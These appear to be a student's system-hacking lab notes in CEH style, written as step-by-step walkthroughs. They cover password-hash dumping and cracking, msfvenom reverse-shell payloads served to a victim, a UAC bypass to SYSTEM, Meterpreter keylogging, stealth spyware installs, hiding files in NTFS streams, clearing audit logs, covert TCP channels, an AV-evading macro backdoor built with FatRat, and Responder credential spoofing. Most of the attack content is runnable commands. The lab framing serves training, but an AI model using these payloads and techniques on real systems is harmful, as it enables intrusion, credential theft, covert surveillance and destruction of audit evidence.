-- The goal of system hacking is gain
1. Access
2. Escalate Privileges
3. Recovering Passwords
4. Execute applications
5. Hide files
-- System hacking helps to
1. Extracting admistrative passwords
2. Hiding files and extracting hidden files
3. Recovering passwords
4. Monitoring a System remotely
-- Password cracking is one of the stage of system hacking.
-- A password needs to access a system.
-- We use password cracking technique by guessing or use automated tools and techniques.
-- Password cracking technique such as dictionary or brute force method.
-- Password cracking techniques are successful because of weak or easy guessing.
1. Dumping and Cracking SAM Hashes to Extract Plaintext Password
-- SAM - Security Account Manager - It is database file present on Windows machine that store user
accounts and security descriptors of users local computer.
-- It store user's password in hashed format (LM or NTLM hash).
-- Attacker generally dump operating system password hashes immediately after a compromise target machine.
-- We need to have administrator access to dump the contents of SAM file.
-- With Hashy decryptor to uncover plaintext passwords.
-- Pwddump7 also be used to dump protected files.
-- Rainbow tables for LM hashes of alphanumeric password are provided by developers.
1. Use the pwdump7 tool to extract password hashes
2. Use the Ophcrack tool to crack the password and obtain plain text password
--> Open the windows command prompt enter we get name and SID
# wmic useraccount get name,sid
Tool : pwdump7
--> Copy the pwdump7 folder and open the folder in command prompt
--> Type PwDump7.exe and press Enter
--> for extracted the password in text file to type and enter
# PwDump7.exe > c:\hashes.txt -- save in c drive
Tool : ophcrack -- Window tool
--> Open the ophcrack application
--> click the load tab and select PWDUMP file from the list.
--> click Tables from top menu and select Vista free in the list and click install
--> Select the folder which contains the tables windows appears. select tables_vista_free.
--> table installed under vista free. which represented by green color. click OK
--> click the Crack on Menu bar and cracking the passwords hashes.
2. Creating and Using Rainbow Tables :
-- Rainbow Table : It is Precomputed table which contains word list like dictionary files and
brute force list and their hash values.
-- It is used to recovering plaintext password form a ciphertext
-- An attacker capture the hash of a password and compares it with the precomputed hash table.
-- If a match is found then the password is cracked.
Tool : winrtgen -- It is tool base on windows
--> Install the tool winrtgen in windows And click Add Table
--> Select ntlm from Hash dropdown list
--> Set Min Len as 4, Max Len as 6 and Chain Count 4000000
--> Select loweralpha from Chartset dropdown list (Setting depend upon the Password) and click OK
--> file will be created and displayed Winrtgen Window and Click OK
--> It automatically turn to Start, click Start button to generate rainbow Tables.
--> Rainbow table automatically saved in folder
--> Execute the RainbowCrack and launch rcrack_gui extension file.
--> click on file from Menu bar and click Load NTLM Hashes from Pwdump file
--> Click on Rainbow Table form the menu bar and click Search Rainbow Tables
--> Open the Rainbow table will save it and click open
--> Rainbow crack automatically start the to crack the hashes and we found the plaintext password
3. Auditing System Password Using L0phtCrack :
Tool : L0phtCrack -- Window Tool
-- Crack System user accounts
-- User accounts passwords that are cracked in short amount of time are consider to be weak and make them stronger
-- Use the L0phtCrack tool to attain user password that can be easily cracked
---> Install and Launch the application
---> And Proceed with Free Trial
--> Click Password Auditing Wizard and click Next
--> Choose Target System and click Next. Select a remote machine and click Next
--> fill the details Host name [ip address of target]
--> select Use Specific User Credential radio-button
--> Enter Credential Username , Password , Domain and click Next
--> Choose Audit Type Section and select Strong Password Audit and click Next
--> Reporting option will be by default selected and click Next
--> Select Run this job immediately and click Next and click Finish
--> In this we successfully Cracked the password
4. Exploiting Client Side Vulnerabilities and Establishing a VNC session
-- VNC enables to attacker gain access and control of target system wherever in the world.
Tool : Metasploit > msfvenom > msfconsole
--> open a terminal type
# msfvenom-p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[our ip] LPORT=4444 -o /root/Desktop/Payload.exe
--> Now create directory to share this file to victim machine and provide permission and copythe file from Desktop to shared location.
# mkdir /var/www/html/share ---- Creating a share folder
# type chmod -R 755 -- Give a permission
# chown -R www-data:www-data/var/www/html/share
# mv /root/Desktop/Test.exe /var/www/html/share -- Move malcious file in to shared folder location
--> Open Metasploit in msfconsole
# msfconsole
# use multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip]
# set LPORT 4444
# expoit --- our framework is running now
--> Open a windows machine as a target and open browser and type http://[kali ip]/share
--> Download payload.exe file and run the file
--> if meterpreter does not work type # sessions -i 1
--> Enter in kali machine and observe we connected to meterpreter section
--> For getting system information of victim machine
# meterpreter > sysinfo
--> Start VNC session with the victim to type
# run vnc
--> Windows appears with the victim Desktop showing in the window
5. Escalating Privileges by Exploiting Client Side Vulnerabilities
-- Exploitation producedure enforced on a weakly patched Windows machine that allows
to gain access to it through meterpreter shell and then employing privileges escalation
techniques to get administrative privileges to the machine through meterpreter shell
-- Escalate privileges on a victim machine by exploiting it's Vulnerabilities
Tool : Metasploit > msfvenom > msfconsole
--> Open a terminal
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[our IP] -f exe > Desktop/Payload.exe
--> Now create directory to share this file to victim machine and provide permission and copythe file from Desktop to shared location.
# mkdir /var/www/html/share ---- Creating a share folder
# type chmod -R 755 -- Give a permission
# chown -R www-data:www-data/var/www/html/share
# ls -la /var/www/html/ | grep share
--> Next start apache server
# service apache2 start
# cp /root/Desktop/Payload.exe /var/www/html/share -- for sharing the payload in windows
--> Start msfconsole
# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip]
# exploit -j -z -- for starting listner
--> Open a windows machine as a target and open browser and type http://[kali ip]/share
--> Download payload.exe file and run the file
--> if meterpreter does not work type # sessions -i 1
--> Enter in kali machine and observe we connected to meterpreter section
--> To get Server username type
# meterpreter > getuid
--> To dump the password hashes
# meterpreter > run post/windows/gather/smart_hashdump -- command is fail because we do not have privileges
--> Now we shall try to escalate the privileges by trying to bypass the user account control
--> # getsystem -- It attempts to elevate the user privileges
# getsystem -t 1 -- command will be fail because of user privileges
--> Background the meterpreter sessioin
# background
--> use module
# use exploit/windows/local/bypassuac_fodhelper
# show options
# set SESSION 1 -- background session in this
# set payload windows/meterpreter/reverse_tcp
# show options
# set LHOST [our ip]
# set Target 0
# exploit
--> Reuse the getsystem command. Type getsystem and press Enter. Type getuid and press Enter
The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY/SYSTEM)
--> Try to dump password hashes by command
# meterpreter > run post/windows/gather/smart_hashdump -- meterpreter successfully extracted NTLM hashes and display in terminal
--> We successfully dump the hashes password
6. Hacking Windows 10 using Metasploit and Post Exploitation Using Meterpreter
-- Backdoors are malicious files that contain Trojan.
-- Attacker buid backdoors in attempt to gain remote access to the victim machines
-- Backdoor through email, file sharing web applications, shared network drives and force to
user execute them.
-- We perform activities such as keylogging, sensitive data extraction and so on
-- Trojan is programe that contains a malicious or harmful code.
-- Detect Trojan and backdoor attacks.
-- Creating a server and testing the network for attack
-- Attacking a network using a sample backdoor and monitor system activity.
--> We have secret informational file on Windows Machine on Desktop
--> Open the linux machine and Launch a terminal and type
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[our IP] -f exe > Desktop/Malware.exe
# mkdir /var/www/html/share
# service apache2 start
# cp /root/Desktop/Malware.exe /var/www/html/share
--> Start msfconsole
# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip]
# show options
# exploit -j -z
--> Open a windows machine as a target and open browser and type http://[kali ip]/share
--> Download payload.exe file and run the file
--> If meterpreter does not work type # sessions -i 1
--> Enter in kali machine and observe we connected to meterpreter section
# meterpreter > sysinfo
# meterpreter > ifconfig -- Display victim machine IP address and MAC address
# getuid -- It display attacker Meterpreter server running as adminstrator on the host
# pwd -- showing current directory
# ls -- showing list of files on remote directory
--> If we found Secret Information or files for read command
# cat filename.txt -- It showing the all information include in file.
--> To view the MACE attribute of file
# timestomp secret.txt -v -- This display created time, accessed time, modified time and entry modified time
--> Change the remote directory
# cd C:\ -- press ls to showing list of files
# download bootmgr
# search -f "filename.ext[pagefile.sys]"
# keyscan_start -- this start capturing all keyboard input from the victim system.
# keyscan_dump -- this dumps all keystrokes
# idletime -- Display the number of seconds for which user has been idle on the remote system
# shutdown -- shut down victim machine
7. User System Monitoring and Surveillance Using Spytech spyAgent :
-- In this establish remote desktop connection with a victim machine and run spying application
using SpyAgent to secretly track user activities.
-- Install and configure Spytech SpyAgent in a victim machine
-- Monitor keystrokes typed website visited and Internet traffic data
Tool : Remote Desktop Connection (Windows)
--> Click Search on the taskbar for Remote Desktop Connection
--> Open the Application and Enter the IP address of (Windows Target Machine)
--> Enter User name as Administrator and click Connect
--> Host machine tries to establish Remote connection with target machine.
--> A Window Security pop us appears, Enter Passoword (for Adminstrator account) we obtained from L0phtCrack tool and click OK and click YES
--> Remote Desktop Connection successfully established and setup Syptech Spyagent and double click Setup (password=spytech)
Tool : SpyAgent > System hacking > General Spyware
--> Install the tool and Enter a Password feild and click Ok
--> Configuration -- click Complte + Stealth Configuration
--> Extras - Click on Load on Windows Startup
--> Click Next until Finish
--> SpyAgent Tamplet display and Start Monitoring and Enter Password we will created
--> In this way we Spy the victim machine and Monitoring the System
8. Web Activity Monitoring and Recording using Power Spy :
-- This works only work if target machine in turned ON
-- Establish Remote Desktop Connection as an attacker and Install Power Spy and leave stealth mode
-- Spying the victim and victim activities.
Tool : Power Spy
--> Follow the above Steps to Connect Remote Desktop Connection and when Connection establish go for next step
--> Install Power Spy and run application then Setup login password and Spyware Wizard is open
--> Click on Start Monitoring also click on Stalth Mode (stealth mode runs Power spy completely invisible in computer)
--> The Hotkey reminder dialog box appear click on OK (to unhide Power Spy). Use Ctrl+Alt+X
--> Disconnect Remote Desktop Connection
--> Login the Victim Machine and do some activity
--> Now Enter our machine and Establish again Remote Desktop Connection and Enter Power Spy application
--> To check User Keystroke click on Keylogger from Power Spy Control Panel
9. Hiding Files Using NTFS Streams :
-- Use NTFS Streams
-- Hide Files
--> Make sure that C:\ drive file system of NTFS format. To check this Go to 'Computer' right click on 'C' Drive and click Properties
--> Go to C drive and crate folder and paste calc.exe (Windows\system32\calc.exe)
--> Launch the Command line prompt
# cd c:\magic
# notepad hide.txt
-- Notepad pop us appears click 'Yes' and Write some text on file
--> Type
# dir -- we list all files including we created and display size also
--> Now hide calc.exe inside the text file (hide.txt)
# type c:\magic\calc.exe > c:\magic\hide.txt:calc.exe
--> Text file size not change and type the command
# mklink backdoor.exe readme.txt:calc.exe
# backdoor.exe -- Calculator application will be executed
10. Hiding Data Using White Space Steganography
Tool : Snow (Windows)
-- Snow exploits the steganography nature of whitespace.
-- It use ICE encryption algorithm
-- Using Snow steganography to hide files and data
-- Hiding files using spaces and tabs
--> Open a new notepad file and type some text and press enter then long press hyphen to draw line below it
--> save the file as secret.txt in the folder where SNOW.EXE located in Steganography tools
--> Open a command line terminal and go to on that folder on Snow directory
--> Then Type a command
# snow -C -m "My Credit Card Number is 123456789" -p "stegno" secret.txt secreat2.txt
--> The data (credit card number) is hidden inside the secret.txt file with contents of secret.txt
--> My content of secret2.txt are secret.txt+ My credit card Number
--> Now type
# snow -C -p "stegno" secret2.txt --- it will shhow contents of secret.txt (stegno is a password which entred while hiding the data)
--> To check the file in GUI the secret.txt in notepad and select on we hidden data inside the spaces and tabs
--> In this Way we hide the data in whitespaces and tabs
11. Image Steganography Using OpenStego :
-- Text can be hidden inside an image using OpenStego tool.
Tool : OpenStego (Window)
-- OpenStego is Java-based application and supports passwordbased encryption for security
-- It is use DES algorithm for data encryption in conjunction with MD5 hashing to derive the DES key from the password provided.
--> Install Setup-OpenStego.exe file and follow the wizard
--> Launch the application from Start Menu
--> OpenStego window shown click elipsis under Message File section -- in this include
--> Enter cover file it is our above we hide our data in that file
--> Both Message file and cover file are uploaded. by performing Stegnography message will hidded in images file under Output Stego File
--> To Save - select Output Stego File and provide file name stego and click open
--> Click the Hide Data -- Message has been successfully hidden. Click Ok
--> When you see the image you only see the image not the Contents message(text file) embedded in it
--> OpenStego Window and click Extract Data
--> Give the Input Stego File and next give the location to hidden file
12. Image Stegnography Using Quick Stego :
Tool : Quick Stego (Windows)
--- In digital steganography electronic communication may include steganographic coding hidden inside a Transport Layer
--- Learn how to hide scret text message in images using Quick Stego
---> Install QS12Setup.exe and follow the Wizard
--> Click on Open Image and Load the image we are hiding the data
--> For hiding the data click on Open Text under Text file when load the text file and click Hide Text
--> Save image when we save the image they are showing normal image.
--> For decrypting the text Load the Stegno file in Open Image
--> The Hidden text inside the image will displayed. In real time attacker use stegnography tools to obtain hidden infomation
13. Viewing , Enabling and Clearing Audit Policies Using Auditpol :
--- We manipulate , disable or erase the system logs
--- Attacker can use inbuilt system utilities to disable or tamper logging and auditing mechanisms in system
--- Auditpol display information on the performance and function to manipulate audit policies.
---> Open the command prompt in administrative privileges in windows. To view all the audit policies type
# auditpol /get /category:*
---> To enable audit policies type
# auditpol /set / category:"system","account logon" /success:enable /failure:enable
---> To check audit policies are enabled
# auditpol /get /category:*
---> To clear audit policies
# auditpol /clear /y
--- In this way we view and clear a auditing policies
14. Covert Channels using Covert_TCP
--- Network use network access control permission to permit/deny the traffic
--- Tunneling is used to bypaas to access control rules of firewall IDS , IPS and web proxies to allow certain traffic
--- Covert channels can be made by inserting data into unused feilds of protocol headers
--- There are many unused or misued fields in TCP / IP over which data can be sent to bypass firewalls.
--- Covert TCP manipulates the TCP/IP header of the data packet to send a file one byte at a time from any host to destination
--- It can act like a server as well as client and can be used to hide the data transimitted inside a IP header
--- This is useful when bypassing firewalls and sending data with legitimate looking packets that contains no data for sniffers to analyze
--- How to carry covert traffic inside of unused fields of TCP and IP headers
---> open a Terminal in linux
# cd Desktop
# mkdir send
# cd send /
# echo / cat "Important Message" > secret.txt
---> Click on the File from favourites bar in Kali Desktop and select Other Locations
---> Type smb : // [ip addrress of our ] in connect to server feild at bottom of Files window and Enter
---> Ask for Username , Domain and Password [Username connect with Administrator to full privileges and password is taken from whre we crack the password from hashes]
---> It Navigate the Covert Tcp module from System hacking Covert_TCP and choose covert_tcp.c and choose copy the file
---> Paste the covert_tcp.c file in send folder on the Desktop
---> Type in Terminal
# cc -o covert_tcp covert_tcp.c
---> Select Ubuntu and type password [Password is our Kali linux]
---> In ubuntu open a terminal and type
# cd Desktop
# mkdir receive
# cd receive
---> open other file location and below type smb:// [ip address as we give our machine] in Server Address
---> Username and Password also be same when we enter first time and click connect
---> Navigate System Hacking Covert TCP under covert_tcp.c file and copy to clipboard and paste to receive folder
---> And follow same command when we use in above and enter
# cc -o covert_tcp covert_tcp.c
# sudo su --- enter a password
---> To start listener type
# ./covert_tcp -dest [destination ip address] -source [source ip address] -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/recieve/receive.txt
---> Go to our linux machine and open Wireshark
---> Open a eth0 interface start capturing network packets
---> In terminal type for sending content of hidden.txt file throgh covert_tcp
# ./covert_tcp -dest [destination ip address] -source [source ip address] -source_port 8888 -dest_port 9999 -file /root/Desktop/send/secret.txt
---> Open ubuntu we are observing message is being recieved byte by byte and open the receive folder and open recieve.txt file this contains message sent from kali machine
---> Go to kali machine and stop wireshark packets capturing
---> We are examing the communication of ubuntu and kali machine we are find each message string being sent in individual packets over a network
----> In wireshark apply filter and enter ubuntu ip address [Reciever/destination ip address] and kali machine ip address [Sender/Source ip address] for capturing tha packets
---> Covert_tcp changes header of the tcp packets and replace it with character of the string one character at time send message without being detected
15. Hacking Windows Server 2012 with a Malicious Office Document Using TheFatRat
--- In this create malicious office document and get meterpreter shell by bypassing anti virus system
--- A FatRat is an exploiting tool which compile malware with popular payload and then compiled malware can be executed windows , android , etc.
--- It is provide easy way to create backdoors and payloads which can bypass most anti virus system
--- Use office document to exploit windows machine
Tool : FatRat (Linux)
---> Open a terminal and type
# fatrat
---> FatRat giving menu options choose [06] Create Fud Backdoor 1000% with PwnWinds and Enter
---> Then choose option [3] Create exe file apache + Powershell and Enter
---> Set LHOST IP [attacker ip address]
---> Set LPORT 4444
----> Type payload and Enter in please enter base name for output files
---> Choose payload option [3] windows/meterpreter/reverse_tcp and Enter
---> In main menu of fatrat choose the option [07] create backdoor for Office wih microsploit
---> Choose option [2] The microsoft office macro on windows
----> Set LHOST IP and Set LPORT 4444 and Enter then type BadDoc --- this is name of output file
---> Enter document body leave it default and enter and ask are you want use custom exe file backdoor option type y and enter
---> Enter the path of EXE file means our payload file as we created payload.exe
----> Choose payload [3] windows/meterpreter/rever_tcp and close the fatrat window
# mkdir /var/www/html/share
# mv /root/TheFatRat/output/BadDoc.docm /var/www/html/share and hit enter
Note : we also use python http server using
# python -m SimpleHTTPServer 8080
# service apache2 start
# msfconsole
# use multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST [our ip address]
# set LPORT 4444
# exploit
---> Open a windows machine as a target and open browser and type http://[kali ip]/share
---> Download payload.exe file and run the file
---> if meterpreter does not work type # sessions -i 1
---> Enter in kali machine and observe we connected to meterpreter section
# meterpreter > sysinfo
---> In this way getting a shell by bypassing the firewall with attach the payload in document
16. Active Online Attack using Responder :
--- By Listening for LLMNR/NBT-NS broadcast request it is possible for an attacker to spoof itself as server
--- Perform LLMNR/NBT-NS Spoofing attack on a network
---> Open a command line terminal and type
# responder -l eth0
---> Go to windows 10 and click start and run prompt and type \\ceh-tools and click OK
---> windows 10 trying to resolve this address but it can't find then ask to other machine via LLMNR or UDP/ 5355 broadcast and respond them
---> open a kali linux and see usr\share\responder\logs view hashes of logged user collected in responder
---> To crack the password open command terminal type
# john /usr/share/responder/logs/ < file name log.txt>
---> We get all cracking password
